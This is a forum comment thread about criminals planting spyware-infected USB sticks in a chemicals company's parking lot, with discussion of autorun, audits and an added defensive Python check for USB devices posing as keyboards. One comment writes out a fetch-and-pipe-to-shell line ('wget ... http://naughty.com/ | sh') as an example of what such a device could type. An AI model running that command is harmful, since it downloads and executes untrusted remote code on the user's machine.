Criminals Distribute Infected USB Sticks In Parking Lot
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
No, that's what operating systems that don't automatically run any executable that happens to appear are for.
Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?
These were targeted specifically though at the one company, greatly increasing the odds of getting into something that they were interested in.
---------- Open Source is capitalism applied to IP.
Seriously, how did this get past the fire-hose? This isn't a new idea, practice, or form of attack. It's actually many many years old (likely dating back to the days of floppy disks). Most company Security and/or IT policies state that you should bring found USB Drives to Security and/or IT, and expressly forbid just plugging them into a company computer on the company network. I have no idea how anyone at Slashdot would have found this remotely news-worthy.
dd if=/dev/zero of=/dev/[usbdrive]
voila, free thumb drive, malware free.
Not if the drive has firmware that detects if it's plugged into a Windows host. For non-Windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3s from your Linux computer and everything is fine, but then when you give it to your wife and she sees a file named "naked_secretary.exe", she runs it and gets infected.
This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.
A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.
Everybody gets what the majority deserves.
The human body either digests or kills anything that's not marked as belonging to the body. It does allow stuff on its surface and in the lining of the stomach I guess, but other than that, it seems to shoot first and ask questions later. Of course it can be tricked or overwhelmed, but it's not nearly as laid back as you seem to think. (Which can lead to horrible conditions where some body cells aren't recognized for some reason, and mercilessly attacked.)
The human body = mean ass motherfucker. Don't even fucking look at the guy, or he will travel back in time and drop your parents before they can meet.
Computers and operating systems, definitely consumer ones = uhm... Ralph Wiggum? Yeah, that seems about right :P
As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:
wget -q -O - http://naughty.com/ | sh
All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo, as doing it effectively would probably require a level of sophistication that would make it not worthwhile for a vague target, but Linux does not magically make USB sticks safe.
Boffoonery - downloadable Comedy Benefit for Bletchley Park
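The comment above notes that a "thumb drive" may enumerate as a keyboard. As an added example (not part of the thread), this Python check reads the interface descriptors Linux exposes in sysfs `modalias` strings and reports anything a plain flash drive should not present; the function name and the sample strings are constructed for illustration.

```python
import re

# Linux publishes each USB interface's descriptor in sysfs, e.g.
# /sys/bus/usb/devices/1-2:1.0/modalias; ic/isc/ip are the interface
# class, subclass and protocol in hex.
MODALIAS_RE = re.compile(
    r"^usb:v[0-9A-F]{4}p[0-9A-F]{4}d[0-9A-F]{4}"
    r"dc[0-9A-F]{2}dsc[0-9A-F]{2}dp[0-9A-F]{2}"
    r"ic(?P<ic>[0-9A-F]{2})isc(?P<isc>[0-9A-F]{2})ip(?P<ip>[0-9A-F]{2})"
)
HID, MASS_STORAGE = 0x03, 0x08                 # USB-IF interface class codes
BOOT_SUBCLASS, KEYBOARD_PROTOCOL = 0x01, 0x01  # HID boot-interface values

# Constructed sample: sysfs interface name -> modalias (IDs are made up).
SAMPLE = {
    "1-1:1.0": "usb:v1234p0001d0100dc00dsc00dp00ic08isc06ip50in00",  # storage
    "1-2:1.0": "usb:v1234p0002d0100dc00dsc00dp00ic08isc06ip50in00",  # storage
    "1-2:1.1": "usb:v1234p0002d0100dc00dsc00dp00ic03isc01ip01in01",  # + keyboard
    "1-3:1.0": "usb:v1234p0003d0100dc00dsc00dp00ic03isc00ip00in00",  # HID only
}

def audit_expected_flash_drive(modaliases, device):
    """Findings for `device` (sysfs name such as "1-2"), assuming the operator
    expects a plain flash drive. An empty list means storage interfaces only."""
    findings, has_storage = [], False
    for iface, alias in sorted(modaliases.items()):
        if iface.split(":")[0] != device:
            continue
        m = MODALIAS_RE.match(alias)
        if not m:
            findings.append(f"{iface}: unparseable modalias")
            continue
        ic, isc, ip = (int(m[k], 16) for k in ("ic", "isc", "ip"))
        if ic == MASS_STORAGE:
            has_storage = True
        elif ic == HID and (isc, ip) == (BOOT_SUBCLASS, KEYBOARD_PROTOCOL):
            findings.append(f"{iface}: HID boot keyboard (can type commands)")
        elif ic == HID:
            # Non-boot HID can still be a keyboard; the report descriptor decides.
            findings.append(f"{iface}: HID interface on a 'storage' device")
        else:
            findings.append(f"{iface}: unexpected interface class 0x{ic:02x}")
    if not has_storage:
        findings.append(f"{device}: no mass-storage interface at all")
    return findings

if __name__ == "__main__":
    for dev in ("1-1", "1-2", "1-3"):
        print(dev, audit_expected_flash_drive(SAMPLE, dev) or "storage only")
```

Enumeration happens the moment the device is plugged in, so a check like this belongs on an isolated analysis machine rather than a production workstation.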
Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?
Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.
As a result, Microsoft removed Autorun from USB drives as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).
A properly coded operating system would not execute an unknown application without first asking the user. Furthermore, a correctly built operating system would not allow applications executed by an unprivileged user to gain control of the operating system. As you see, your comments lack validity. As far as the website you mentioned, that advice will only work with systems that have been badly configured with the intention of allowing an intruder to penetrate them. I suggest you get familiar with real operating systems and stop playing with what in the computer world qualifies as “toddler operating systems” that lack strength and maturity to operate in an unprotected environment.
I know that taking away the mouse and keyboard dramatically reduces the number of user mistakes, but I do wonder if this isn't taking it a little too far.
Assorted stuff I do sometimes: Lemuria.org